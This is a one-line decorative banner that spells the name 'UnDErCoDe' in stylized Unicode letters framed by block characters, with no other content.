▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁